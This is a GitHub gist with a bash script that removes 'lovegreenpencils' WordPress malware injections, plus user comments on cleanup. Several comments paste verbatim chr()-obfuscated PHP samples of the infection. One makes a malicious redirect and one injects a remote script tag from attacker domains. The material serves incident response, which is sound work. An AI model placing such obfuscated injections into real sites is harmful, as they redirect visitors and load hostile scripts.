Skip to content

Instantly share code, notes, and snippets.

@black-dragon74
Created December 2, 2020 21:04
Show Gist options
  • Save black-dragon74/86fc18a91e814019228c02531f0ea01c to your computer and use it in GitHub Desktop.
Save black-dragon74/86fc18a91e814019228c02531f0ea01c to your computer and use it in GitHub Desktop.
Fixes love green pencils wordpress malware
#!/bin/bash
# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g"
totalInfections=0
filesProcessed=0
echo "Welcome to lovegreenpencils malware fixer by black-dragon74"
echo "This fix is divided into 3 phases."
echo "Phase 1 fixes the \`beckup\` files."
echo "Phase 2 fixes the header injections."
echo "Phase 3 fixes the deep rooted JS PHP and JSON injections"
echo
# Begin phase 1
read -p "Press any key to begin the phase 1: " yay
clear
echo "Scanning....."
for f in $(grep -ril "Element.prototype.appendAfter" ./*); do
# Don't fix the fixer itslef :D
if [[ $f == "./fix.sh" ]]; then
continue;
fi
# If a backup exists, we created it, don't process it again
if [[ $(echo $f | grep ".perlbak") ]]; then
continue;
fi
# Otherwise fix all files recursively
echo "Found file $f"
echo "Backing up and fixing the infection"
echo
perl -pi.perlbak -e 's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi' "${f}"
((filesProcessed ++))
done
echo "Phase 1 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0
# Begin phase 2
read -p "Press any key to begin the phase 2: " yay
clear
echo "Scanning....."
for f in $(grep -ril "REQUEST\['lt'\]" ./*); do
# Don't fix the fixer itslef :D
if [[ $f == "./fix.sh" ]]; then
continue;
fi
# If a backup exists, we created it, don't process it again
if [[ $(echo $f | grep ".perlbak") ]]; then
continue;
fi
# Otherwise fix all files recursively
echo "Found file $f"
echo "Backing up and fixing the infection"
echo
perl -pi.perlbak -e 's/<\?php\ \$v[\s\S]*?\?>//gi' "${f}"
((filesProcessed ++))
done
echo "Phase 2 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0
# Begin phase 3
read -p "Press any key to begin the phase 3: " yay
clear
echo "Scanning....."
for f in $(grep -ril "lovegreenpencils" ./*); do
# Don't fix the fixer itslef :D
if [[ $f == "./fix.sh" ]]; then
continue;
fi
# If a backup exists, we created it, don't process it again
if [[ $(echo $f | grep ".perlbak") ]]; then
continue;
fi
# Otherwise fix all files recursively
echo "Found file $f"
echo "Backing up and fixing the infection"
echo
perl -pi.perlbak -e "s/<script\ type=\'text\/javascript\'\ src=\'https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi" "${f}"
((filesProcessed ++))
done
echo "Phase 3 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0
# Processing complete.
echo
echo "Found, backed up and fixed $totalInfections infected files."
read -p "Processing complete. Press any key to exit. " yay
exit 0
@korawit
Copy link

korawit commented Jan 24, 2021

In my case I only change

update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
update wp_options set option_value='http://yoursite.com' where option_name='home';

@vinvin27
Copy link

Amazing thanks you =)

@synstsia
Copy link

In my case I only change

update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
update wp_options set option_value='http://yoursite.com' where option_name='home';

Be careful with that- this thing pops a lot of back doors and javascript down where it can.. it needs to be cleaned out entirely, as the site forwarding is the least malicious thing it does.

@abelbarraza3
Copy link

I have found a new variation that is getting injected into a couple hundred files. I attempted to download your tool and update it to the new variation I found but it seems like I am doing it wrong.

Here is the new variation:

<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?>

@vinvin27
Copy link

Do you have cPanel on your hosting account ? If yes, you should have Terminal app to launch thoses commands

@felipesalas1
Copy link

I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do

@vinvin27
Copy link

I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do

Hello,

I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this : grep -ril '$a="h"."ea"."der"' ./* to find the new variation ?

@felipesalas1
Copy link

I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do

Hello,

I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this : grep -ril '$a="h"."ea"."der"' ./* to find the new variation ?

Thank you! I will try this.

If think I found the plugin that have the backdoor. Is a nuked version of elementor Pro

@vinvin27
Copy link

Usually, the hacker infect large amount of file. Beware and launch the grep command on root directory.
Check if you haven't file call "lte_" or something on the root then check if you haven't got any maintenance.php or maintenance folder or wp-sheeep on plugin folder also check if you don"t have wp-stream.php file on root as well.

The best thing I thinks once the cleaning done, its to export DB, Export uploads/ themes/ plugins/ and reinstall fresh WP.

@therealmckellar
Copy link

therealmckellar commented Mar 4, 2021

I am getting this error when running the script:

image

@abelbarraza3
Copy link

I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment